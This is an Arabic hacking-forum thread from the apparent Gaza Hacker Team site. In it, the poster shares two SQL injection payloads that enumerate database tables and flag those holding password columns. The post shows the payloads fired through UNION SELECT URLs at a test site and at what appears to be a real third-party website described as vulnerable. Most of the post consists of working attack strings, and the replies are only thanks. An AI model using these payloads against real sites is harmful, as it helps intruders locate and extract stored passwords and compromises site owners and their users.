تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة


  فريق قراصنة غزة || Gaza Hacker Team > ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: > .:: SQL-injection , حقن قواعد بيانات ::.

.:: SQL-injection , حقن قواعد بيانات ::. هنا توضع جميع شروح sql injection واداوت الخاصة فى حقن قواعد البيانات ..

اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية BlackRose
BlackRose
المشرف العام
BlackRose غير متواجد حالياً
 
رقم العضوية : 17559
تاريخ التسجيل : Feb 2011
مكان الإقامة :
عدد المشاركات : 3,241
عدد النقاط : 10
قوة التقييم :
Injector Boy
افتراضي [جديد] الأسلوب السابع {كود لإستخراج جميع الجداول التى تحتوى على باسوردات}

كُتب : [ 01-04-2014 - 09:05 PM ]




السلام عليكم ورحمة الله تعالى وبركاتة

أهلاً بكم أخوتى مرة أخرة فى أحدىَ دروس الحقن المتقدم


جديد الأسلوب السابع {كود لإستخراج جميع الجداول التى تحتوى على باسوردات}

الأسلوب بسيط جدا ووظيفة الكود تحديد الجداول التى تحتوى باسورد باللون الأخضر مع كتابة باسورد باللغة الأنجليزية بجوار الجدول ولا أقول إن الطريقة فاعلة على كل المواقع بس حبيت أشاركم هذا الأسلوب .

الأكواد

الكود الأول

CASE statement

كود PHP:
(select  (@xfrom (select (@x:=0x00),(select (0from  (information_schema.tableswhere (0x00in  (@x:=concat(@x,0x3c62723e,@tbl:=table_name,(Select CASE WHEN ( (select  count(*) from information_schema.columns where table_name[email protected]tbl and  column_name like 0x257061737325)>0THEN  0x3c666f6e7420636f6c6f723d677265656e3e3c623e202a2a2a2070617373202a2a2a203c2f623e3c666f6e7420636f6c6f723d6
26c75653e 
else 0x00 END)))))x


الكود الثانى

IF() function

كود PHP:
(select  (@xfrom (select (@x:=0x00),(select (0from  (information_schema.tableswhere (0x00in  (@x:=concat(@x,0x3c62723e,@tbl:=table_name,(Select IF(( select count(*)  from information_schema.columns where table_name[email protected]tbl and column_name  like 0x257061737325 >0),  0x3c666f6e7420636f6c6f723d677265656e3e3c623e202a2a2a2070617373202a2a2a203c2f623e3c666f6e7420636f6c6f723d6
26c75653e
0x00))))))x


الأن إلى التنفيذ العملى

موقع مصاب


كود PHP:
http://www.modsecurity.org/testphp.vulnweb.com/artists.php?artist=0 union select 1,2,3 -- 






بأستخدام الكود الأول


كود PHP:
http://www.modsecurity.org/testphp.vulnweb.com/artists.php?artist=0  union select 1,(select (@x) from (select (@x:=0x00),(select (0) from  (information_schema.tables) where (0x00) in  (@x:=concat(@x,0x3c62723e,@tbl:=table_name,(Select CASE WHEN ( (select  count(*) from information_schema.columns where [email protected] and  column_name like 0x257061737325)>0) THEN  0x3c666f6e7420636f6c6f723d677265656e3e3c623e202a2a2a2070617373202a2a2a203c2f623e3c666f6e7420636f6c6f723d626c75653e  else 0x00 END)))))x),3 -- 





موقع أخر بأستخدام الكود الثانى


كود PHP:
http://www.mangaldeep.co.in/news1.php?id=-3+union+select+1,(select  (@x) from (select (@x:=0x00),(select (0) from  (information_schema.tables) where (0x00) in  (@x:=concat(@x,0x3c62723e,@tbl:=table_name,(Select IF(( select count(*)  from information_schema.columns where [email protected] and column_name  like 0x257061737325 >0),  0x3c666f6e7420636f6c6f723d677265656e3e3c623e202a2a2a2070617373202a2a2a203c2f623e3c666f6e7420636f6c6f723d626c75653e,  0x00))))))x),3,4 --+- 









# أنتهى بفضل الله تعالى فى عهد سيدى الرئيس الدكتور : محمد مرسى عيسى العياط
بتاريخ
3 ربيع أول لعام 1435 هـ المواف 4/1/2014 من الميلاد #


================================
الحقوق محفوظة : gaza|hacker|net
================================



توقيع : BlackRose

خبير الأمن والحماية ,قائد فريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI بالـ HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه , مٌحب للأنمي الياباني .
.
facebook.com/Melegy.GHI

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 2 )
hck

رقم العضوية : 29141
تاريخ التسجيل : Jun 2012
مكان الإقامة :
عدد المشاركات : 159
عدد النقاط : 10

hck غير متواجد حالياً

افتراضي

كُتب : [ 01-04-2014 - 09:33 PM ]


شكرا جزيلا

كفيت ووفيت


توقيع : hck

الله اكبر

والعزة لله ولرسوله

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 3 )
vinex23

رقم العضوية : 47000
تاريخ التسجيل : Jul 2013
مكان الإقامة :
عدد المشاركات : 55
عدد النقاط : 10

vinex23 غير متواجد حالياً

افتراضي

كُتب : [ 01-05-2014 - 02:21 AM ]


ماشاءالله ابداع
وعودة قوية جدا
كنا منتظرين بفارغ الصبر ان تكمل لنا الدروس
بارك الله بك وجعله في ميزان حسناتك
تقبل مروري أخي بلاك روز


توقيع : vinex23



رد مع إقتباس
بياناتي
 رقم المشاركة : ( 4 )
BlackRose
المشرف العام
رقم العضوية : 17559
تاريخ التسجيل : Feb 2011
مكان الإقامة :
عدد المشاركات : 3,241
عدد النقاط : 10

BlackRose غير متواجد حالياً

Injector Boy

افتراضي

كُتب : [ 01-05-2014 - 08:09 PM ]


بارك الله فيكم أخوتى وأحيكم على المرور العطر ^__^

توقيع : BlackRose

خبير الأمن والحماية ,قائد فريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI بالـ HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه , مٌحب للأنمي الياباني .
.
facebook.com/Melegy.GHI

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 5 )
mouhtchaks

رقم العضوية : 54297
تاريخ التسجيل : Dec 2013
مكان الإقامة :
عدد المشاركات : 25
عدد النقاط : 10

mouhtchaks غير متواجد حالياً

Free

افتراضي

كُتب : [ 01-05-2014 - 10:42 PM ]


شكرراا اخي و بارك الله فيك


توقيع : mouhtchaks



رد مع إقتباس
بياناتي
 رقم المشاركة : ( 6 )
عمر75

رقم العضوية : 12468
تاريخ التسجيل : Aug 2010
مكان الإقامة :
عدد المشاركات : 211
عدد النقاط : 10

عمر75 غير متواجد حالياً

افتراضي

كُتب : [ 01-05-2014 - 11:30 PM ]


بارك الله فيك اخي بلاك
كالعادة بطل الله يخليك
تحياتي
اخوك عمر



توقيع : عمر75



====█ ▇ ▆ ▅ ▄ ▃ ▂▂ ▃ ▄ ▅ ▆ ▇====
لا اله الا الله محمد رسول الله

====█ ▇ ▆ ▅ ▄ ▃ ▂▂ ▃ ▄ ▅ ▆ ▇====

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 7 )
محمد اسير الروح

رقم العضوية : 49859
تاريخ التسجيل : Sep 2013
مكان الإقامة :
عدد المشاركات : 50
عدد النقاط : 10

محمد اسير الروح غير متواجد حالياً

الله انصر اخواننا المسلمين

افتراضي

كُتب : [ 01-05-2014 - 11:40 PM ]


عاشت ايدك بداع متواصل

توقيع : محمد اسير الروح

لااله الله الله
نبدى باسم جلاله
محمد رسول الله خاتم رساله


رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
لإستخراج, الأسلوب, التي, الجداول, السابع, باسوردات, تحتوى, جميع, جديد, علي, كود


يتصفح الموضوع حالياً : 1 (0 قرصان و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
القوة الشاملة للدولة وكيفية حسابها قراصنة غزة .:: قسم للتوعية الأمنية ::. 8 06-12-2015 03:59 AM
نص قرار التقسيم رقم ١٨١ التوصية بخطة لتقسيم فلسطين قراصنة غزة .:: قسم قضية فلسطين ::. 2 09-26-2011 01:47 PM
غزة ' تتحدى المحرقه ' Casper .:: شهداء فلسطين ::. 0 01-17-2011 03:57 PM
مؤسسة الرايه الإعلاميه " رسالة إلى الأمة " Casper قسم الكتب الاسلامية 6 10-11-2010 10:49 PM
» » النقد الأسطوري عند الدكتور مصطفى ناصف في { قراءة ثانية لشعرنا black-man البحوث العلمية 15 09-26-2010 12:57 PM


جميع الأوقات بتوقيت GMT +2. الساعة الآن 05:52 PM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @ قسم الحقن المٌتقَدِّم [بداية العهد] @